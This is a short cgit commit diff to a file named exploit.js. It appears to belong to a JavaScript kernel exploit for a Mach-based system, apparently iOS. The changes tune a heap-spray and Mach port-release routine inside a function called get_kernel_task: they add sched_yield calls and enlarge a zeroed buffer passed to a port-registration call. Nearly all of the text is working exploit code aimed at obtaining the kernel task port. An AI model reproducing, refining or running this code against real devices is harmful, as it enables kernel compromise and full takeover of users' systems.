summaryrefslogtreecommitdiff
path: root/src/js/kexp/exploit.js
diff options
context:
space:
mode:
Diffstat (limited to 'src/js/kexp/exploit.js')
-rwxr-xr-xsrc/js/kexp/exploit.js7
1 files changed, 6 insertions, 1 deletions
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index d42457e..6870963 100755
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -462,11 +462,13 @@ function get_kernel_task() {
again: while (true) {
+ sched_yield();
var dummy = shit_heap(4);
for (var i = 0; i < PORTS_NUM_PRESPRAY; i++) {
spray(big_buf, big_size, dummy);
}
+ sched_yield();
var dummy = shit_heap(4);
for (var i = 0; i < PORTS_NUM; i++) {
// for (var i = 0; i < 8; i++) {
@@ -477,15 +479,18 @@ again: while (true) {
spray(small_buf, small_size, dummy);
}
+ sched_yield();
for (var i = 0; i < PORTS_NUM; i++) {
// for (var i = 0; i < 8; i++) {
release_port_ptrs(read_u32(fp + (i << 2)));
}
- var arrmpt = shit_heap(8);
+ var arrmpt = shit_heap(16);
write_u32(arrmpt, 0);
write_u32(arrmpt + 4, 0);
+ write_u32(arrmpt + 8, 0);
+ write_u32(arrmpt + 12, 0);
mach_ports_lookup_shit_dealloc();
var ret__ = r3gister(mach_task_self(), arrmpt, 2, 3);
mach_ports_lookup_shit();
generated by cgit v1.2.3 (git 2.39.1) at 2025-11-30 20:51:09 +0000